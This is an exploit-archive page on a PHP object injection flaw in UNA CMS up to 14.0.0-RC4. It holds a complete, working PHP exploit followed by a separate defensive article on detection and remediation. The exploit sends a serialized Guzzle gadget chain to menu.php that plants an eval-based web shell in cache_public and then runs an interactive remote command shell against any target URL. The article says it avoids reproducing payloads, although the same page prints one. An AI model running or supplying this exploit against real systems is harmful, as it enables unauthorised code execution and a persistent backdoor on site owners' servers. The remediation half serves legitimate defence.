UNA CMS 14.0.0-RC - PHP Object Injection

Exploit Author: Egidio Romano Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2025-04-08

# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
# Author: Egidio Romano aka EgiX
# Software link.......: https://unacms.com


[-] Software Links:
https://unacms.com
https://github.com/unacms/una

[-] Affected Versions:
All versions from 9.0.0-RC1 to 14.0.0-RC4.

[-] Vulnerability Description:
The vulnerability is located in the
/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is
not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by remote,
unauthenticated attackers to inject arbitrary PHP objects into the
application scope, allowing them to perform a variety of attacks, such
as writing and executing arbitrary PHP code.

<?php

/*
    ------------------------------------------------------------------------------------
    UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
    ------------------------------------------------------------------------------------
    
    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://unacms.com
    
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] Vulnerability Description:
      
    The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
    Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
    method, user input passed through the "profile_id" POST parameter is not properly
    sanitized before being used in a call to the unserialize() PHP function. This can be
    exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
    the application scope, allowing them to perform a variety of attacks, such as
    writing and executing arbitrary PHP code.
    
    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2025-01
*/
set_time_limit(0);
error_reporting(E_ERROR);

print "\n+------------------------------------------------------------+";
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/una/";
print "\nExample....: php $argv[0] https://unacms.com/\n\n";
die();
}

define('ON_APACHE', true);
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');

class GuzzleHttp_Cookie_SetCookie
{
private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
}

class GuzzleHttp_Cookie_FileCookieJar
{
private $cookies, $filename = SH_PATH, $storeSessionCookies = true;

function __construct()
{
$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
}
}

$url = $argv[1];
$ch  = curl_init();

$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);

curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));

print "\n[+] Performing PHP Object Injection";

curl_exec($ch); curl_close($ch);

print "\n[+] Launching shell\n";

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";

while(1)
{
print "\nuna-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}

UNA CMS PHP Object Injection (<= 14.0.0-RC4) — Analysis, Impact, and Remediation

This article examines a PHP Object Injection vulnerability affecting UNA CMS releases from 9.0.0-RC1 through 14.0.0-RC4. It explains the root cause, realistic impacts, detection techniques, and concrete remediation strategies for developers and administrators. The goal is to provide defensible guidance that prevents exploitation while avoiding replication of exploit payloads or step-by-step offense techniques.

Vulnerability summary

UNA CMS contained a vulnerable code path where unsanitized user input was passed directly to PHP's unserialize() function. When user-supplied serialized data is unserialized, an attacker can craft object payloads that instantiate application classes (gadget chains) and trigger unintended behavior — including file writes, code execution, or privilege escalation — depending on the classes present in the application.

Why PHP Object Injection is dangerous

Object instantiation: unserialize() can recreate complex objects with properties that interact with application logic.
Gadget chains: Applications often include classes with magic methods (e.g., __wakeup, __destruct) or serialization-aware logic that can be abused to perform sensitive operations.
Remote, unauthenticated risk: If the vulnerable endpoint is reachable without authentication, attackers can attempt exploitation remotely.
Wide impact range: Potential outcomes range from data disclosure to arbitrary code execution, depending on the available classes and privileges.

Technical root cause

The core issue is the pattern of unserializing attacker-controlled input. A representative simplified vulnerable pattern is shown below (this is an abstract example illustrating the programming anti-pattern, not an exploit):

<?php
// Dangerous pattern: do not unserialize raw user input
$payload = $_POST['profile_id'] ?? '';
$object = unserialize($payload);
// Application acts on $object...
?>

Explanation: unserialize() will attempt to instantiate objects encoded in the serialized string. If an attacker crafts a serialized object matching a class available in the application, PHP will instantiate it and may invoke magic methods that execute code or manipulate application state.

Impact and real-world consequences

Arbitrary code execution: In the presence of writable file sinks and appropriate gadget classes, attackers may write a file containing PHP code and cause it to be executed.
Unauthorized privilege changes: Attackers can manipulate session- or ACL-related objects to escalate privileges or impersonate users.
Data exfiltration and integrity loss: Sensitive data may be read or modified, and malware persistence mechanisms may be deployed.

Detection — code and runtime indicators

Perform both static code analysis and runtime monitoring:

Search the codebase for calls to unserialize(), especially where the input originates from $_POST, $_GET, cookies, or other user-controlled channels.
Audit endpoints that accept serialized payloads and confirm whether user input is validated or restricted before unserialization.
Monitor web directories for unexpected files or file-type changes (e.g., new .phtml/.php files in writable cache folders).
Review web server logs for anomalous requests to endpoints that can accept serialized data, and for unusual HTTP headers or long encoded payloads.
Look for error logs indicating class-not-found or serialization-related warnings after suspicious requests.

Remediation — short-term and permanent fixes

Remediation should follow a defense-in-depth approach: patching, input validation, safer deserialization, and minimizing attack surface.

Apply vendor patches: The primary mitigation is upgrading UNA CMS to a patched release supplied by the vendor that removes unsafe unserialize() usage or hardens the endpoint.
Sanitize and validate input: Never unserialize arbitrary user input. If a parameter is expected to be a numeric ID, cast it or validate it as an integer.
Use safer deserialization options: If deserialization is unavoidable, restrict allowed classes or use safer data formats like JSON.
Harden file system and permissions: Ensure web directories are not world-writable and that the application user has only the minimum required privileges.
Use WAF and monitoring: Deploy web application firewalls and set alerts for unusual requests and file-write operations.

Safe code examples and explanations

Example 1 — If the parameter should be an integer (preferred, simplest fix):

<?php
// Secure handling when profile_id is expected to be a numeric identifier
$profile_id = filter_input(INPUT_POST, 'profile_id', FILTER_VALIDATE_INT);
if ($profile_id === false || $profile_id === null) {
    // handle invalid input (400 Bad Request, error message, etc.)
    http_response_code(400);
    exit('Invalid profile_id');
}
// proceed using $profile_id as an integer
?>

Explanation: When the endpoint expects a numeric ID, never accept serialized objects. Using filter_input with FILTER_VALIDATE_INT enforces that only integer values are accepted, eliminating the possibility of object injection via this parameter.

Example 2 — If you must deserialize data but want to restrict object creation (PHP 7+):

<?php
// Safer unserialize usage in PHP 7+: disallow object instantiation
$raw = $_POST['data'] ?? '';
$data = @unserialize($raw, ['allowed_classes' => false]);
if ($data === false && $raw !== serialize(false)) {
    // invalid serialized data — handle error
    http_response_code(400);
    exit('Invalid serialized payload');
}
// $data is now an array/scalar, no objects are created
?>

Explanation: The second parameter to unserialize() allows restricting object instantiation. Passing ['allowed_classes' => false] prevents PHP from creating objects during unserialization, which eliminates classic PHP object injection risks. Note: this does not validate the structure or types of the data — application-level validation is still required.

Example 3 — Prefer JSON when exchanging structured, user-provided data:

<?php
// Use JSON as a safer interchange format for structured data
$raw = file_get_contents('php://input'); // or use $_POST field
$decoded = json_decode($raw, true);
if (json_last_error() !== JSON_ERROR_NONE) {
    http_response_code(400);
    exit('Invalid JSON payload');
}
// validate fields in $decoded before use
?>

Explanation: JSON deserialization produces arrays/scalars by default and does not instantiate application classes. Combined with schema validation (e.g., required fields, types), JSON is usually safer than PHP serialization for accepting external structured data.

Additional mitigation controls

Implement strict Content Security Policies and limit the application's ability to execute unexpected code.
Use code reviews and static analysis — flag all unserialize() uses for manual inspection.
Harden PHP configuration: disable dangerous functions if not required, and consider disabling auto_prepend_file/autoloaders that could be abused to instantiate classes.
Monitor integrity of templates and cache directories and restrict write access to those locations.
Apply principle of least privilege on database and file system accounts.

Incident response guidance

If you suspect exploitation, preserve logs and make an image backup of the server for forensic analysis.
Search for recently created or modified files in web-accessible directories and scan them for embedded PHP code.
Rotate credentials and secrets that may have been exposed and reissue compromised keys.
Patch the vulnerability and then perform a post-patch review to ensure no backdoors or persistence mechanisms remain.

Secure development lifecycle recommendations

Train developers on the risks of unsafe deserialization and secure alternatives.
Add automated tests that detect unserialize() usage with untrusted inputs.
Include deserialization threat modeling in design reviews for components that accept external data.

Summary

PHP Object Injection vulnerabilities, like the one found in UNA CMS up to 14.0.0-RC4, arise when untrusted input is unserialized without validation. The practical mitigations are straightforward: apply vendor patches, eliminate unnecessary unserialize() calls, validate and sanitize input (cast numeric IDs), prefer JSON for structured data, and employ PHP's allowed_classes option when deserialization is unavoidable. Combined with file-system hardening, monitoring, and a robust patching process, these measures greatly reduce the risk of object injection and its severe consequences.